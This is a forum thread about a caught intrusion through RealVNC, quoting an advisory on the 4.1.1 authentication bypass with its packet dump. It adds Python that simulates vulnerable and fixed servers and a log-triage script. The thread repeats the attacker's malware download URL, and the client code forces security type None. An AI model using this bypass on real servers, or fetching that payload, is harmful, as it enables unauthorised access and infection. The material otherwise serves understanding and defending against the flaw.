VNC exploits, security hack caught in progress

Associate | Joined 18 Oct 2002 | Posts 1,601 | Location Fab36 Dresden
Are there any known exploits for VNC? The reason I ask is that I just caught a remote connection that took control while I was browsing these forums. I noticed the system tray icon changed colour from white to dark blue, then saw the Start > Run dialog trying to launch this:

Note: this is more than likely a malicious piece of code.

http://195.218.117.44/sp1.exe

That was the point I killed the VNC session, which is protected with a strong password.
 
Yep, confirmed: VNC 4.1.x authentication has been compromised by the easiest hack I have ever seen. Downloading the latest updates right now!

Excerpt from http://www.securiteam.com/unixfocus/5WP0D1FIKC.html

Vulnerable Systems:
* RealVNC version 4.1.1

As documented in rfbproto.pdf by Tristan Richardson, the RFB (remote frame buffer) protocol performs an initial handshake which allows clients and servers to negotiate appropriate authentication measures. There are several methods of authentication, including the standard DES Challenge-Response, as well as an option to disable authentication completely. Due to an incorrect implementation, clients are able to force the server to disable authentication, and allow login without a password.

Proof of Concept:
1. Server sends its version, "RFB 003.008\n"
2. Client replies with its version, "RFB 003.008\n"
3. Server sends 1 byte which is equal to the number of security types offered
3a. Server sends an array of bytes which indicate security types offered
4. Client replies with 1 byte, chosen from the array in 3a, to select the security type
5. The handshake, if requested, is performed, followed by "0000" from the server

In RealVNC 4.1.1 and possibly prior versions which implement RFB 003.008 (though not RealVNC 4.0), the server does NOT perform a check to determine if the byte sent by the client in step 4 has actually been offered by the server in step 3a. In effect, authentication is moved from the server side to the client side. It is possible to force your client to simply request "Type 1 - None" as the security type, and gain access to the server without having to go through the time consuming and cumbersome password entry field.

Here is a typical packet dump:

Server -> Client: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Server version
Client -> Server: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Client version
Server -> Client: 01 02 <- One field follows... and that field is 02 (DES Challenge)
Client -> Server: 01 <- Ahh, the lovely 1 byte exploit! Beautiful, isn't it?
Server -> Client: 00 00 00 00 <-- Authenticated!
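The five-step handshake and the packet dump above, as an added example that is not part of the advisory excerpt or of RealVNC's code. It models both sides of the RFB 3.8 security handshake over an in-memory socket pair: a server that honours whatever security type the client names (the 4.1.1 behaviour, tracked as CVE-2006-2369) beside a server that checks the client's choice against the list it actually offered, and a client that always answers with the single byte 0x01 ("Type 1 - None"). The VncAuth branch is a stand-in (fixed zero challenge, always rejects) because the demo has no password to verify against; the function and constant names are this example's own.

```python
"""Added example: RFB 3.8 security handshake, vulnerable vs. fixed server."""
import socket
import struct
import threading

RFB_VERSION = b"RFB 003.008\n"   # 12 bytes, exactly as in the packet dump
SEC_INVALID = 0                  # server sends a zero-length list to refuse
SEC_NONE = 1                     # "Type 1 - None": no authentication
SEC_VNCAUTH = 2                  # DES challenge-response
SEC_RESULT_OK = 0                # SecurityResult 00 00 00 00
SEC_RESULT_FAILED = 1


def recv_exact(conn, n):
    """Read exactly n bytes; RFB handshake fields are fixed-width."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during handshake")
        buf += chunk
    return buf


def server_handshake(conn, offered=(SEC_VNCAUTH,), check_choice=True):
    """Server side of steps 1-5.  check_choice=False reproduces the
    RealVNC 4.1.1 bug: the client's chosen type is acted on without
    confirming it was in the list the server sent in step 3a.
    Returns True if the server treats the client as authenticated."""
    conn.sendall(RFB_VERSION)                                   # step 1
    if recv_exact(conn, 12) != RFB_VERSION:                     # step 2
        conn.sendall(bytes([SEC_INVALID]))                      # refuse
        return False
    conn.sendall(bytes([len(offered)]) + bytes(offered))        # steps 3, 3a
    choice = recv_exact(conn, 1)[0]                             # step 4
    if check_choice and choice not in offered:
        # The fix: a type we never offered is a protocol error; fail closed.
        conn.sendall(struct.pack(">I", SEC_RESULT_FAILED))
        return False
    if choice == SEC_NONE:
        conn.sendall(struct.pack(">I", SEC_RESULT_OK))          # step 5
        return True
    if choice == SEC_VNCAUTH:
        # A real server sends a random 16-byte challenge and checks the DES
        # response against the password.  This demo holds no password, so it
        # uses a placeholder (all-zero) challenge and always rejects.
        conn.sendall(bytes(16))
        recv_exact(conn, 16)
        conn.sendall(struct.pack(">I", SEC_RESULT_FAILED))
        return False
    conn.sendall(struct.pack(">I", SEC_RESULT_FAILED))
    return False


def client_force_none(conn):
    """Client that ignores the offered list and replies with the single
    byte 0x01 from the dump.  Returns (offered types, SecurityResult)."""
    recv_exact(conn, 12)                                        # step 1
    conn.sendall(RFB_VERSION)                                   # step 2
    count = recv_exact(conn, 1)[0]                              # step 3
    offered = list(recv_exact(conn, count))                     # step 3a
    conn.sendall(bytes([SEC_NONE]))                             # step 4
    result = struct.unpack(">I", recv_exact(conn, 4))[0]        # step 5
    return offered, result


def run_exchange(check_choice):
    """Drive one client/server exchange over an in-memory socket pair."""
    srv_sock, cli_sock = socket.socketpair()
    outcome = {}

    def serve():
        try:
            outcome["authenticated"] = server_handshake(
                srv_sock, check_choice=check_choice)
        finally:
            srv_sock.close()

    t = threading.Thread(target=serve)
    t.start()
    offered, result = client_force_none(cli_sock)
    t.join()
    cli_sock.close()
    return {"offered": offered, "result": result,
            "authenticated": outcome["authenticated"]}


if __name__ == "__main__":
    # Vulnerable: offered [2], client says 1, result 0 -> authenticated.
    print("vulnerable server:", run_exchange(check_choice=False))
    # Fixed: same client bytes, result 1 -> rejected.
    print("fixed server:     ", run_exchange(check_choice=True))
```

The only difference between the two servers is the `choice not in offered` check, which is the whole of the fix: the client's byte in step 4 is untrusted input and must be validated against the server's own step 3a list before any branch acts on it.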
 
siztenboots said:
Are there any known exploits for VNC? The reason I ask is that I just caught a remote connection that took control while I was browsing these forums. I noticed the system tray icon changed colour from white to dark blue, then saw the Start > Run dialog trying to launch this:

Note: this is more than likely a malicious piece of code.

http://195.218.117.44/sp1.exe

That was the point I killed the VNC session, which is protected with a strong password.


Well the first thing to do is report it to the abuse address of the originating IP address, assuming you have a connection log of the incoming VNC connections.
I would also drop an email to the owner of the IP address they tried to download the file from, as it looks like a web server (which may have been compromised).

And as a last point, make sure you are not running the VNC server on the standard VNC port, it's a commonly scanned port. And you really should not run VNC on the standard port if you want to run VNC across the internet.
 
You may want to check the rest of your comp for rootkits and the like. Yes, there are a few exploits out for VNC at the moment. It's possible that the exe which they were trying to download was a rootkit (sadly it's 404 now, so I can't see what it is :( )
 
bitslice said:
Have just notified the website.

The URL resource is now 404.

Out of interest, when running this from the Run dialog, it launched from Firefox, my default. This would have blocked .exe by default behaviour, although the remote hacker could easily click on the override.
 
siztenboots said:
The URL resource is now 404.

Out of interest, when running this from the Run dialog, it launched from Firefox, my default. This would have blocked .exe by default behaviour, although the remote hacker could easily click on the override.

To be honest a lot of script kiddies have automated download scripts that will try different compromised webservers from a list to download new malware. You don't want to be messing around on a box for more time than is needed.
 
More to the point, why are you leaving remote control services exposed to the entire Internet? VNC should never be left unfirewalled. Only the most battle hardened bits of software should be exposed to the Internet.
 
The Mad One said:
Hmm, scary. I've got VNC running on 2 of my PCs which are running 24/7. I've just removed the port forwarding to them till this is fixed.

It's already been fixed, and has been for a while.
 
NathanE said:
More to the point, why are you leaving remote control services exposed to the entire Internet? VNC should never be left unfirewalled. Only the most battle hardened bits of software should be exposed to the Internet.

If you're referring to me, VNC needs port forwarding; how else would it work?
I'm running a Linux firewall, which is more than enough protection.

garyh said:
It's already been fixed, and has been for a while.

I guess I forgot which version I'm running, which is 4.2.5. I guess siztenboots' information is a bit out of date then?
 
The Mad One said:
I guess I forgot which version I'm running, which is 4.2.5. I guess siztenboots' information is a bit out of date then?

You would be running the updated version, with the exploit fixed. This was released almost immediately after the proof of concept was released, so hats off to the producers of RealVNC for acting so quickly.

If you've been a victim of such a widely known exploit I really have no sympathy; if you're tech savvy enough to use a VNC product, you should be tech savvy enough to keep it up to date IMO.
 
siztenboots said:
Are there any known exploits for VNC? The reason I ask is that I just caught a remote connection that took control while I was browsing these forums. I noticed the system tray icon changed colour from white to dark blue, then saw the Start > Run dialog trying to launch this:

Note: this is more than likely a malicious piece of code.

http://195.218.117.44/sp1.exe

That was the point I killed the VNC session, which is protected with a strong password.

Happened to me before, so I moved to UltraVNC.
 
The Mad One said:
If you're referring to me, VNC needs port forwarding; how else would it work?
I'm running a Linux firewall, which is more than enough protection.
Presumably it's an unconfigured firewall though, which is as good as having no firewall. If you configure it to only allow your IP/ranges access then you'd not have been hacked.
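The two pieces of advice in this thread that need a connection log, bitslice's "report it to the abuse address of the originating IP address, assuming you have a connection log" and the point above about only allowing your own IP ranges through the firewall, as an added example that is not part of any post. It runs an allowlist check over a constructed VNC server log and also flags any session where the client negotiated security type None, the pattern of the bypass discussed earlier in the thread. The log line format is an assumption loosely modelled on a Windows VNC server log; the regexes, the allowlist and the addresses are this example's own and should be adjusted to the real log.

```python
"""Added example: triage VNC connection-log lines against an IP allowlist."""
import ipaddress
import re

# Constructed sample log (documentation addresses, not real peers).
# Line format is an assumption for this example; adjust the regexes below
# to whatever your VNC server actually writes.
SAMPLE_LOG = """\
Tue May 16 20:41:02 2006 Connections: accepted: 203.0.113.7::3356
Tue May 16 20:41:03 2006 SConnection: Client needs protocol version 3.8
Tue May 16 20:41:03 2006 SConnection: Client requests security type None(1)
Tue May 16 20:41:09 2006 Connections: closed: 203.0.113.7::3356
Tue May 16 21:02:11 2006 Connections: accepted: 192.0.2.44::50112
Tue May 16 21:02:12 2006 SConnection: Client needs protocol version 3.8
Tue May 16 21:02:12 2006 SConnection: Client requests security type VncAuth(2)
"""

# Ranges you administer from; everything else should have been dropped by
# the firewall, so a hit from outside is a finding in itself.
ALLOWED = [ipaddress.ip_network("192.0.2.0/24"),
           ipaddress.ip_network("198.51.100.10/32")]

ACCEPTED_RE = re.compile(r"Connections: accepted: (\S+)::(\d+)")
SECTYPE_RE = re.compile(r"Client requests security type (\w+)\((\d+)\)")
SEC_NONE = 1


def parse_sessions(log_text):
    """Group log lines into accepted sessions with the security type the
    client asked for (None if the log never shows one)."""
    sessions = []
    current = None
    for line in log_text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            current = {"peer": m.group(1), "port": int(m.group(2)),
                       "sectype": None, "line": line}
            sessions.append(current)
            continue
        m = SECTYPE_RE.search(line)
        if m and current is not None:
            current["sectype"] = int(m.group(2))
    return sessions


def triage(log_text, allowed=ALLOWED):
    """Return one finding per suspicious session: peer outside the
    allowlist, or a session that negotiated security type None."""
    findings = []
    for s in parse_sessions(log_text):
        addr = ipaddress.ip_address(s["peer"])
        reasons = []
        if not any(addr in net for net in allowed):
            reasons.append("peer outside allowlist")
        if s["sectype"] == SEC_NONE:
            reasons.append("security type None negotiated")
        if reasons:
            findings.append({"peer": s["peer"], "port": s["port"],
                             "reasons": reasons, "evidence": s["line"]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["peer"], "->", "; ".join(f["reasons"]))
        print("   ", f["evidence"])
```

The `evidence` line is what goes into the abuse report: the timestamp and source address::port straight from your own log, which is what the remote network's abuse desk will ask for.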
 
NathanE said:
Presumably it's an unconfigured firewall though, which is as good as having no firewall. If you configure it to only allow your IP/ranges access then you'd not have been hacked.

Indeed, but actually it's not that black and white; it's possible to bypass software firewalls pretty easily using process infection. Once your binaries have been replaced it's not that difficult to hide information from userland tools, especially if your malware is running at ring 0.
 
NathanE said:
If you configure it to only allow your IP/ranges access then you'd not have been hacked.
garyh said:
If you've been a victim of such a widely known exploit I really have no sympathy; if you're tech savvy enough to use a VNC product, you should be tech savvy enough to keep it up to date IMO.

Why are you two acting like I've been hacked? Because I haven't. :confused:
 